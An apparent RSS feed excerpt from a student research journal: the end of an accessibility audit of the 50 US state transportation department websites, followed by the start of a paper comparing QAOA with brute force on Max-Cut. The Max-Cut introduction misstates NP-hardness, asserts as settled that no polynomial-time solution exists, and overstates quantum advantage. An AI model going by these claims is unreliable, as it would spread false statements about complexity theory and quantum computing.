<p>Because Department of Transportation websites are large and highly variable, only two pages per site were selected for auditing: the homepage and the first critical navigation page. This decision balanced cross-state comparability with practical feasibility while still capturing the sections most frequently used by the public. The homepage was selected as the most common entry point for both general and assistive-technology users, while the first critical navigation page represented the site’s most essential public task. To avoid arbitrary selection, a standardized decision rule was applied: beginning from the homepage’s global navigation bar, the first listed link that matched one of the following categories, Driver Services or Licensing, Road Conditions or Closures, Jobs or Careers, Transit Schedules or Permits, was chosen. If multiple categories appeared, “Driver Services/Licensing” was prioritized due to its broad public relevance. When a navigation menu lacked those options, the first link leading to a transactional or informational task page (rather than a press release or PDF list) was selected. This consistent process ensured methodological transparency and reproducibility. While auditing only two pages limits the comprehensiveness of within-site analysis, it allowed for a uniform evaluation across all fifty states and captured the design and accessibility conditions most visible to users.</p>



<p>Each selected page was scanned using the Skynet checker, and the resulting data were recorded for each state, including the percentage of accessibility checks passed, total number of failed checks, categories of issues, corresponding WCAG conformance levels, and affected disability types. A subset of flagged items, particularly color contrast and missing form labels, was manually verified through HTML inspection to validate the tool’s accuracy. Beyond automated results, qualitative observations were added to capture design elements not detected by scanning software, such as semi-transparent overlays, poor visual hierarchy, and mismatched ADA statements. To analyze these qualitative features systematically, an a priori codebook was developed around recurring design themes such as legibility, information structure, and visual clutter. Two independent coders applied the codebook to a stratified 20 percent sample of websites selected across high, medium, and low compliance categories. Inter-rater reliability was calculated using Cohen’s kappa, with a target threshold of 0.75 for substantial agreement. Discrepancies were resolved collaboratively, and the finalized codebook was applied to the remaining sites by the primary coder with periodic spot checks to prevent drift.</p>



<p>To strengthen internal validity, a post hoc subset of ten websites underwent manual WCAG checklist testing focused on success criteria most frequently implicated in the automated findings, including 1.4.3 (Contrast), 1.3.1 (Info and Relationships), and 2.1.1 (Keyboard Navigation) (W3C, 2024). These manual checks were paired with basic task-based tests, such as locating renewal information or road closures using keyboard-only navigation, to evaluate whether the issues flagged by automation corresponded to tangible usability barriers.</p>



<p>Several limitations accompany this methodology. First, analyzing only two pages per website constrains the ability to generalize findings across entire sites. The decision to do so reflects a necessary balance between breadth, covering all fifty states, and depth, though future research should expand to include deeper navigational flows and internal task pages. Second, automated tools typically detect only 30 to 40 percent of accessibility violations, as many issues, such as reading order, focus visibility, and contextual link meaning, require human interpretation. Although manual validation and qualitative review were used to mitigate this limitation, undetected errors may remain. Third, while inter-rater reliability was established on a subset of sites, qualitative interpretation beyond that sample may still contain subjectivity. Additionally, because Department of Transportation websites frequently update banners, alerts, and layouts, the results represent a snapshot of accessibility performance at a single point in time. Lastly, the findings are partially shaped by Skynet’s proprietary detection algorithms, meaning results could vary with alternative auditing platforms. Despite these constraints, the combined quantitative and qualitative approach offers a robust, reproducible framework for assessing both technical accessibility and user-centered design quality across large-scale public web infrastructure.</p>



<h2 class="wp-block-heading"><strong>Results</strong></h2>



<p>One of the most revealing findings in our audit was the wide variation in accessibility compliance across the 50 U.S. State Department of Transportation websites. Overall compliance scores ranged from 14.7 percent (Kansas) to 94.8 percent (Ohio), with a mean of 68.9 percent, a median of 70.4 percent, and a standard deviation of 16.2. This range indicates substantial disparity in digital accessibility across states. While a small subset of websites exceeded 90percent compliance, suggesting strong alignment with WCAG 2.2 standards, nearly half of the states fell below 70 percent, placing them in the semi-compliant or noncompliant category. These findings underscore that accessibility is not being uniformly prioritized, even though these websites serve as primary entry points to essential public services.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="672" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-1024x672.png" alt="" class="wp-image-4635" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-1024x672.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-300x197.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-768x504.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-1536x1008.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-1000x656.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-230x151.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-350x230.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM-480x315.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.48.58-PM.png 1700w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>In tandem with compliance percentages, the total number of failed checks per site provided further insight into accessibility gaps. Across all 50 websites, the number of failures ranged from 7 to 33, with a mean of 18.5, a median of 17, and a standard deviation of 6.3. A Pearson correlation analysis between the compliance percentage and number of failed checks revealed a strong negative relationship (r = –0.87), indicating that lower compliance percentages were closely associated with higher counts of accessibility violations. This confirms that automated scoring aligned with practical accessibility performance: as the number of failures increased, overall compliance predictably declined.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="631" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-1024x631.png" alt="" class="wp-image-4636" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-1024x631.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-300x185.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-768x473.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-1536x947.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-1000x616.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-230x142.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-350x216.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM-480x296.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-8.49.47-PM.png 1746w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Across all sites, the most frequent accessibility failures involved poor color contrast, unlabeled form elements, missing alternative text, and improperly structured headings. Color contrast errors were the single most common issue, appearing on 88 percent of audited pages. These problems most directly affect users with visual impairments, who comprised the most impacted disability category according to tool classification data. Users with mobility impairments were also frequently affected, particularly when keyboard-only navigation failed or focus indicators were missing from interactive elements. Cognitive accessibility issues appeared less frequently, though dense text structures and inconsistent navigation patterns created additional barriers for some users.</p>



<p>Qualitative analysis reinforced these quantitative findings. One of the most pervasive design flaws observed was the use of semi-transparent images layered behind text or interactive elements. Over half of the websites used banners or background visuals that reduced text readability, particularly in combination with low-contrast color palettes. While intended to enhance visual appeal, these choices often compromised functional accessibility for users with low vision or reading impairments. This tension between aesthetic branding and practical usability reflects a broader misalignment between design intent and user inclusion.</p>



<p>A second major qualitative issue involved ADA compliance statements. Nearly all websites included a footer or dedicated page declaring adherence to the Americans with Disabilities Actor referencing WCAG standards. However, in many cases, these declarations did not correspond with actual usability. Unlabeled navigation links, inaccessible PDFs, and missing screen reader compatibility persisted despite such statements. This disconnect suggests that accessibility is too often treated as a formal requirement rather than an integrated design value.</p>



<p>Lastly, a large proportion of websites displayed visually and structurally outdated layouts, characterized by retro web design features such as bold color palettes, dense typography, pixel-style graphics, and nonresponsive navigation. These stylistic elements, reminiscent of early 2000s web design, were common among low-performing states and corresponded with lower compliance scores. Although such designs do not directly violate WCAG standards, they undermine usability by reducing clarity, scalability, and modern functionality. The persistence of these outdated designs indicates a lack of investment in modernization and highlights how institutional neglect can perpetuate digital inequity.</p>



<p>Taken together, these quantitative and qualitative results suggest that accessibility performance across U.S. State Department of Transportation websites varies widely and follows clear patterns. The strong negative relationship between compliance scores and failure counts reinforces that many accessibility problems are structural rather than incidental. The recurring qualitative trends, visual obstruction, performative ADA compliance, and outdated design, further reveal that technical adherence alone is insufficient. Accessibility, when treated as a checklist rather than a design ethic, continues to fall short of ensuring equitable digital access.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="455" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-1024x455.png" alt="" class="wp-image-4637" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-1024x455.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-300x133.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-768x341.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-1536x682.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-1000x444.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-230x102.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-350x155.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM-480x213.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-23-at-9.00.55-PM.png 1676w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading"><strong>Discussion</strong></h2>



<p>The results of this study highlight that digital accessibility must be treated as a core design priority rather than an afterthought. One of the most revealing findings was the percentage of accessibility checks passed across the 50 U.S. State Department of Transportation websites, which provided a general benchmark of compliance with WCAG 2.2 standards. While a handful of states achieved high compliance (above 90%), a significant portion scored well below that, often in the 60–70% range, placing them in the semi-compliant category, and a few even dipped below 50%, indicating a severe lack of attention to accessibility.</p>



<p>This inconsistency underscores that accessibility is not being uniformly prioritized, even though these websites serve as primary entry points to essential public services. While automated tools can flag compliance issues, many of the most disruptive problems, like our qualitative issues, stem from broader design decisions that prioritize aesthetics or legacy structures over usability. This suggests that accessibility must be embedded into the design process from the beginning, with thoughtful attention to how content is visually presented, navigated, and interacted with across diverse user needs. Designers and developers should move beyond minimal compliance and adopt inclusive design practices that address both technical standards and real-world user experiences.</p>



<p>The findings also connect to broader discussions of digital inequality. Accessibility gaps on government websites do not merely represent technical oversights; they reinforce existing disparities in civic participation, mobility, and access to information. When people with disabilities cannot easily navigate transportation websites, they face compounded barriers to employment, healthcare, and education. These inequities mirror a larger pattern in digital governance where technological design choices can either expand or restrict public inclusion. Addressing accessibility, therefore, is not only about fixing websites but about ensuring that digital infrastructure functions as a public good that serves all users equitably.</p>



<p>Moreover, the gap between stated ADA compliance and actual usability points to the need for more transparent, user centered workflows in public sector web development. Merely posting accessibility statements does little if sites remain functionally inaccessible. Agencies should incorporate routine manual audits, iterative usability testing with individuals with disabilities, and continuous training for design teams to better understand accessibility beyond code-level fixes. This also calls for inter-agency collaboration and standardization efforts that can ensure consistency across states, reducing the accessibility divide.</p>



<p>From a policy perspective, these findings suggest several actionable steps. State and federal agencies should establish standardized accessibility benchmarks for all government websites, accompanied by annual reporting and public accountability mechanisms. Accessibility audits should be integrated into procurement and design contracts, ensuring compliance from the earliest stages of development. Federal oversight could also incentivize interagency collaboration through shared design systems and centralized accessibility resources, reducing redundancy and improving consistency across states. Finally, accessibility should be framed not just as a compliance goal but as a measure of digital equity, directly tied to broader civil rights objectives and inclusive governance.</p>



<p>Ultimately, digital accessibility should be treated not only as a legal and technical requirement but as a moral and civic responsibility, essential to building equitable public services. By viewing accessibility through the lens of digital inequality and embedding it within public policy and design practice, governments can move closer to realizing the promise of technology as a tool for inclusion rather than exclusion.</p>



<h2 class="wp-block-heading"><strong>Conclusions</strong></h2>



<p>In conclusion, this study reveals that while some U.S state Department of Transportation websites demonstrate meaningful progress toward digital accessibility, the majority fall short of providing equitable, user-centered online experiences for people with disabilities. Through both quantitative data and qualitative observations, we found a persistent disconnect between stated ADA compliance and actual usability, with recurring issues that disproportionately affect users with visual, mobility, and cognitive impairments. These findings underscore the need for accessibility to be fully integrated into the design and development lifecycle of public websites as a foundational principle of inclusive governance. As digital access becomes increasingly central to civic participation and public service delivery, state agencies must recognize accessibility as both a civil rights imperative and a design obligation in order to ensure that all citizens can navigate, interact with, and benefit from digital infrastructure that supports everyday life. </p>



<h2 class="wp-block-heading"><strong>Bibliography</strong></h2>



<p><em>Accessibility in Design &#8211; Definition and Explanation</em>. (2024, June 10). The Oxford Review &#8211; or Briefings. https://oxford-review.com/the-oxford-review-dei-diversity-equity-and-inclusion-dictionary/accessibility-in-design-definition-and-explanation/</p>



<p>Acosta-Vargas, P., Lujan-Mora, S., &amp; Salvador-Ullauri, L. (2017). Quality evaluation of government websites. <em>2017 Fourth International Conference on EDemocracy &amp;</em> <em>EGovernment (ICEDEG)</em>. https://doi.org/10.1109/icedeg.2017.7962507</p>



<p>ADA National Network. (n.d.). <em>What is the Americans with Disabilities Act (ADA)?</em> ADA National Network. https://adata.org/learn-about-ada</p>



<p>CDC. (2020). <em>Centers for Disease Control and Prevention</em>. Centers for Disease Control and Prevention; CDC. https://www.cdc.gov</p>



<p>Currie, G., &amp; Gook, M. (2009). Measuring the Performance of Transit Passenger Information Websites. <em>Transportation Research Record: Journal of the Transportation Research</em> <em>Board</em>, <em>2110</em>(1), 137–148. https://doi.org/10.3141/2110-17</p>



<p>Gibson, D. (2024, November 8). <em>2024 WCAG &amp; ADA Website Compliance Requirements |</em> <em>Accessibility.Works</em>. Accessibility.works. https://www.accessibility.works/blog/2025-wcag-ada-website-compliance-standards-requirements/</p>



<p>Goode, L. F. (2021, March 8). <em>About | HeinOnline</em>. HeinOnline. https://heinonline.org/HOL/LandingPage?handle=hein.journals/hlelj38&amp;div=8&amp;id=&amp;page=.</p>



<p>Olalere, A., &amp; Lazar, J. (2011). Accessibility of U.S. federal government home pages: Section 508 compliance and site accessibility statements. <em>Government Information Quarterly</em>, <em>28</em>(3), 303–309. https://doi.org/10.1016/j.giq.2011.02.002</p>



<p>Seattle SEO Company. (2022, April 16). <em>Retro Web Design</em>. Seattle Web Design &amp; SEO Agency; Seattle Web Design Agency. https://visualwebz.com/retro-web-design/</p>



<p>US Department of Transportation. (2019). <em>State Transportation Web Sites | Federal Highway</em> <em>Administration</em>. Dot.gov. https://www.fhwa.dot.gov/about/webstate.cfm</p>



<p>USAgov. (2019). <em>Official Guide to Government Information and Services | USAGov</em>. Usa.gov. <a href="https://www.usa.gov">https://www.usa.gov</a></p>



<p>W3C. (2019). <em>World Wide Web Consortium (W3C)</em>. W3.org. https://www.w3.org</p>



<p>W3C. (2024, December 12). <em>Web Content Accessibility Guidelines (WCAG) Overview</em>. Web Accessibility Initiative (WAI). https://www.w3.org/WAI/standards-guidelines/wcag/</p>



<p>Wagner, M., Manish Shirgaokar, Misra, A., &amp; Marshall, W. (2024). Navigating ADA Compliance. <em>Journal of the American Planning Association</em>, 1–18. https://doi.org/10.1080/01944363.2024.2343661</p>



<p></p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://exploratiojournal.com/wp-content/uploads/2025/11/imageedit_1_4882057431.jpg" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Aashi Agarwal
</h5><p>Aashi Agarwal is a designer, accessibility advocate, and creative leader passionate about the intersection of technology, communication, and inclusion. She specializes in human-centered design and digital accessibility, developing tools and platforms that make information and interaction more equitable. Her work with organizations such as the NIMBLE Mindset has focused on translating complex data into intuitive, interactive storytelling that highlights impact and community. Aashi also explores how inclusive design principles can extend beyond digital interfaces into cultural and artistic spaces.</p><p> In her leadership role within the performing arts community, she has spearheaded initiatives to expand access to live theatre, including implementing ASL interpretation and inclusive audience design practices for school productions, and developing programs that welcome and support diverse participants. She aims to continue bridging the gap between structure and creativity to design systems that empower diverse voices and create meaningful, accessible experiences for all users.
</p></figure></div>



<p></p>
<p>The post <a href="https://exploratiojournal.com/roadblocks-to-digital-access-accessibility-and-design-gaps-in-50-state-department-of-transportation-websites/">Roadblocks to Digital Access: Accessibility and Design Gaps in 50 State Department of Transportation Websites</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Quantum Approximate Optimization Algorithm for the Max-Cut Problem: Performance Comparison with Classical Approaches on NISQ Devices</title>
		<link>https://exploratiojournal.com/quantum-approximate-optimization-algorithm-for-the-max-cut-problem-performance-comparison-with-classical-approaches-on-nisq-devices/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=quantum-approximate-optimization-algorithm-for-the-max-cut-problem-performance-comparison-with-classical-approaches-on-nisq-devices</link>
		
		<dc:creator><![CDATA[Yohhaan Yung Kang Huang]]></dc:creator>
		<pubDate>Tue, 28 Oct 2025 10:32:35 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4578</guid>

					<description><![CDATA[<p>Yohhaan Yung Kang Huang<br />
The Village School</p>
<p>The post <a href="https://exploratiojournal.com/quantum-approximate-optimization-algorithm-for-the-max-cut-problem-performance-comparison-with-classical-approaches-on-nisq-devices/">Quantum Approximate Optimization Algorithm for the Max-Cut Problem: Performance Comparison with Classical Approaches on NISQ Devices</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="937" height="937" src="https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot.jpg" alt="" class="wp-image-4579 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot.jpg 937w, https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot-300x300.jpg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot-150x150.jpg 150w, https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot-768x768.jpg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot-230x230.jpg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot-350x350.jpg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot-480x480.jpg 480w" sizes="(max-width: 937px) 100vw, 937px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Yohhaan Yung Kang Huang<br><strong>Mentor</strong>: Dr. Roberto Dos Reis<br><em>The Village School</em></p>
</div></div>



<h2 class="wp-block-heading"><strong>Abstract</strong></h2>



<p>The Max-Cut problem is a foundational NP-hard combinatorial optimization problem with quite a few uses, such as circuit and semiconductor design, financial modeling, and data flow optimization. The exponential nature of the problem makes scalability over large inputs infeasible, making it a benchmark for solving such problems using methods like quantum computing due to them being infeasible for classical algorithms in such situations.</p>



<p>While the Quantum Approximate Optimization Algorithm (QAOA) has shown theoretical promise for solving such problems, the practical threshold at which quantum approaches outperform classical methods on real noisy intermediate-scale quantum (NISQ) devices remains unclear. This paper aims to resolve this uncertainty. The investigation itself compares the performance of QAOA executed on IBM&#8217;s 133-qubit Torino quantum processor for the Max-Cut problem on modern quantum devices and compares its performance against the classical brute-force method in order to gauge the potential advantage that quantum algorithms may provide as input size grows. It consists of running both algorithms over (unweighted) graph sizes ranging from 4 &#8211; 24 nodes for 5 independent trials each, measuring both execution time and approximation ratio. The QAOA implementation uses a circuit with a singular fixed depth and fixed Hamiltonian parameters to ensure consistency over all trials &amp; fairness in comparisons between graph sizes. However, this along with noise leads to a low chance of the optimal cut being produced.</p>



<p>The classical solver exhaustively evaluated all 2<sup>n</sup> possible partitions to produce the optimal cut value. Classical execution time grew exponentially from 0.16 milliseconds (4 nodes) to 87.6 seconds (24 nodes), consistent with the brute-force algorithm’s behavior. On the other hand, QAOA maintained near-constant execution time (~1.33 seconds across all graph sizes), with both approaches converging at approximately 19 nodes. However, QAOA&#8217;s approximation ratio declined from 0.95 (4 nodes) to 0.52 (24 nodes), reflecting limitations of shallow circuit depth and hardware noise. These findings demonstrate that QAOA exhibits superior scalability as graph size increases compared to exact classical methods but due to the limitations of NISQ quantum hardware, is unable to achieve this for large graph sizes, where it can be most practical, without accuracy as a trade-off. As quantum hardware advances in the future, high circuit depth will be possible with low noise or even error correction, which is expected to strengthen the performance of algorithms like QAOA substantially, allowing its theoretical advantages to be reaped to the fullest at solving NP-hard problems like the Max-Cut.</p>



<p><em><strong>Key words</strong>:  compare, evaluate, execution time, approximation accuracy, scalability</em></p>



<h2 class="wp-block-heading"><strong>Introduction</strong></h2>



<h4 class="wp-block-heading"><strong>Optimization</strong></h4>



<p>In mathematics and computer science, optimization is a process that involves finding the best solution from the search space according to some defined criteria, while following certain rules/constraints according to the problem situation (Wright, 2025).&nbsp;</p>



<p>The search space, in the context of optimization, refers to the set of all possible solutions that adhere to the problem&#8217;s constraints or objectives. Thus, it represents the feasible solutions that can be evaluated to find the optimal solution according to the objective function (Wright, 2025), which is a mathematical expression that defines the goal of an optimization problem, which is usually to maximize or minimize a quantity. It quantifies the desired outcome, serving as a guide for decision making and showing how close a solution is to the desired one (Fiveable, n.d.).</p>



<h4 class="wp-block-heading"><strong>Combinatorial Optimization</strong></h4>



<p>Combinatorial optimization is a type of discrete optimization that refers to problems on discrete structures such as graphs. It aims to find the best or optimal solution to problems that have a finite set of possible solutions (discrete search space), and the best solution is usually the one that minimizes or maximizes the problem&#8217;s objective function (Lee, 2010; DeepAI, n.d.).</p>



<p>For each combinatorial optimization problem, there is a decision problem, which, in simple terms, is a yes/no version of it. It asks whether there is a feasible solution to the problem using a measurement threshold (Jaillet, 2010). For instance, given 10 interconnected cities, the optimization problem would be to find the shortest path from city a to city b. A corresponding decision problem would be to determine whether or not there is a path from city a to city b that crosses less than or equal to 5 intermediate cities.</p>



<p>Due to the nature of decision problems, if one can come up with an answer to it, that means the corresponding optimization problem is &#8216;feasible&#8217; – a solution exists that satisfies all the constraints of the problem. Failing to do so means that the corresponding optimization problem is &#8216;infeasible&#8217;, or that no solutions exist that satisfy all constraints of the problem. Even if a problem is feasible, it may not necessarily be ‘bounded’, that is, there is no limit to how &#8220;good&#8221; or &#8220;optimal&#8221; the solution can get for the objective function. Thus, if an optimization problem is not infeasible and not unbounded, it must have an optimal solution and is therefore solvable (Maltby &amp; Ross, n.d.).</p>



<h2 class="wp-block-heading"><strong>The Max-Cut Problem</strong></h2>



<p>Now that discrete optimization and combinatorial optimization has been made clear, it is now appropriate to visit the &#8216;Max-Cut Problem&#8217;, a famous example of combinatorial optimization and the focus of this paper.</p>



<p>Let there be a graph G = (V,E)   with vertices V  and edges E . For starters, a graph in this context refers to a set of vertices/nodes in a 2-D space, which are mathematical abstractions corresponding to objects associated with each other by some criteria in place and are connected to one-another in some form by a set of edges E , each of which connects 2 nodes (Luca, 2023). Let there be a partition that divides set   V into 2 disjointed sets of vertices  A and  B. An edge is said to be “cut” by the partition if it connects 2 vertices that are not in the same set. Thus, the objective of the Max-Cut problem is to find a partition of vertices  V into complementary subsets A  and  B in graph V  that maximizes the edges between them (Goemans &amp; Williamson, 1995). An example is shown in the figure below.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="902" height="460" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-33.png" alt="" class="wp-image-4581" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-33.png 902w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-33-300x153.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-33-768x392.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-33-230x117.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-33-350x178.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-33-480x245.png 480w" sizes="(max-width: 902px) 100vw, 902px" /></figure>



<p>In the figure above, the image on the left shows the original graph with its set of nodes and edges. The image in the center shows nodes 0 and 1 in the red set and nodes 2 and 3 in the blue set, and it shows the possible cuts with that node with that specific set distribution (not the maximum cut), which is 3 cuts. The image on the right, however, shows the set distribution that gives the maximum number of cuts for the graph, which is 4 cuts – nodes 1 and 2 in the red set and nodes 0 and 3 in the blue set. It is important to note that distributing all nodes in the opposite sets – nodes 0 and 3 in the red set and nodes 1 and 2 in the blue set – will also give the same result because the edges that are “cut” will still connect nodes in different sets, which is all that matters. Note that any explorations of the Max-Cut problem in this paper deals with unweighted graphs, and the concept of weightage is being ignored entirely.</p>



<p>When checking whether the Max-Cut problem is solvable for all input sizes, firstly, it is imperative to assess its feasibility. To do so, assess the decision version of it, which is the following: Given a graph k   and an integer k, determine whether there is a cut value of at least   (Goemans &amp; Williamson, 1995). It is indeed possible to have a cut of some value. Take the example in Fig.1 for instance. Let k be equal to 3; on the graph in the middle, a cut value of at least 3 is indeed possible. Thus, as the decision version is solvable, the max-cut problem is feasible. Lastly, it is imperative to assess its boundedness. As the name suggests, the Max-Cut problem must have a maximum possible cut value for a specific graph. To prove this, take the example in Fig.1 once more. The graph on the right side of the figure shows the maximum possible cut value for the given graph. If two nodes of the same set are adjacent to one-another, the maximum possible cut value is 3, which is shown by the graph in the middle, but if they are opposite each other, which is shown by the graph on the right, each node in the rectangular portion of the graph (and not the diagonal – the edge between node 0 and node 3) is connected to a node of the opposite set, maximizing the cut value for the given graph, which is 4. As there is a maximum cut value for this graph, specifically, there has to be a maximum cut value for every other graph with any number of vertices and combination of edges. This shows that the Max-Cut problem is bounded. Therefore, as it is both feasible and bounded, it is solvable.</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; Although the objective of the Max-Cut problem may seem straightforward, no solution has been developed that can find the optimal solution in an efficient manner in all cases due to the nature of the statement problem, the limits of modern hardware, and scalability issues. Due to this, various approximation algorithms have been created to deliver suboptimal solutions, and quite a few of them utilize principles of quantum mechanics to do so, which allow parallel computations, that is, the ability to evaluate multiple possibilities at once. This is because the addition of a single qubit gives rise to exponentially more states and possibilities, giving quantum computers the ability to solve problems exponentially faster than classical algorithms (Tepanyan, 2025). A few classical approximation algorithms that have had sufficient success in approximating the Max-Cut problem are those using ‘greedy algorithms’ (Codecademy, 2022) and the ‘Goemans-Williamson Algorithm’ (Toni, 2018). However, these are not as effective as quantum algorithms, such as those using the ‘Quantum Approximate Optimization Algorithm’ (QAOA) (Ceroni, 2025) and Quantum Genetic Algorithms (QGA) (Viana &amp; Neto, 2024).</p>



<p>As mentioned in the previous paragraph, both classical and quantum approximation algorithms have made progress in addressing the Max-Cut problem, but their effectiveness in practice depends heavily on the underlying hardware and the scalability of the method used. This raises an important question: when do quantum algorithms outperform their classical counterparts? Addressing this question motivates the main objectives of this paper. Specifically, we aim to explore and demonstrate the feasibility of running QAOA for the Max-Cut problem on real quantum devices and to compare its performance against the classical brute-force method (AlgoEducation, n.d.) in order to gauge the potential advantage that quantum algorithms may provide as input size grows.</p>



<p>Our work is driven by the hypothesis that while classical algorithms excel at solving problems with small to medium-sized input values at a great degree of efficiency, they become infeasible for solving large problems, and that quantum approaches, such as QAOA, have the potential to surpass them as the input size increases</p>



<h2 class="wp-block-heading"><strong>Background – Classical vs. Quantum Approaches</strong></h2>



<h4 class="wp-block-heading"><strong>Computational Complexity</strong></h4>



<p>To understand why quantum solutions are usually superior to classical solutions, it is imperative to understand why classical solutions can fail, for which the knowledge of computational complexity is needed. Computational complexity is a measure of how difficult a computational problem is and how much time is required to solve it. The Max-Cut problem specifically, is an ‘NP-Hard’ problem.</p>



<p>For an ‘NP’ hard problem, a proposed solution can be verified in polynomial time, but the solution itself cannot be found as quickly. Examples of NP problems are the ‘Boolean Satisfiability Problem’ (SAT) and the Sudoku Puzzle (Kanwal, 2021).</p>



<p>A problem is ‘NP-Hard’ if every problem in NP can be reduced to it in polynomial time, that is, if an NP-Hard problem can be solved efficiently (in polynomial time), all NP problems can be solved efficiently (Kanwal, 2021). In fact, quite a few NP-Hard problems are not even in NP because their solutions cannot be verified in polynomial time.</p>



<p>The reason why the Max-Cut problem, or the optimization version at least, is NP-Hard is because of two reasons. Firstly, it is indeed possible to count the edges cut, but it is not possible in all cases to verify that a certain partition of the vertices in set V  gives the maximum cut without essentially solving the problem itself. Secondly, it is a fact that as the number of vertices increases linearly, the number of possible partitions increases exponentially, which is why no perfect solution in polynomial time can exist for the Max-Cut problem.</p>



<h4 class="wp-block-heading"><strong>Classical Solutions to the Max-Cut Problem</strong></h4>



<p>The max-cut problem can be written as a quadratic optimization function. To know why classical methods are not ideal, it is necessary to understand the structure of this objective function (Lowe, 2025), which reveals the very nature of the Max-Cut problem. Let  G = (V,E) be a graph with vertices   V and edges E  , and let  w<sub>ij</sub>​ denote the weight of edge (i,j)  . This paper utilizes unweighted graphs, so w<sub>ij</sub> = 1   . The variables x<sub>i</sub> E { -1,1}   are binary variables for each vertex, representing the set assignment of the vertex – which subset of the partition it belongs to – that is A or B. The objective function can then be expressed as:</p>



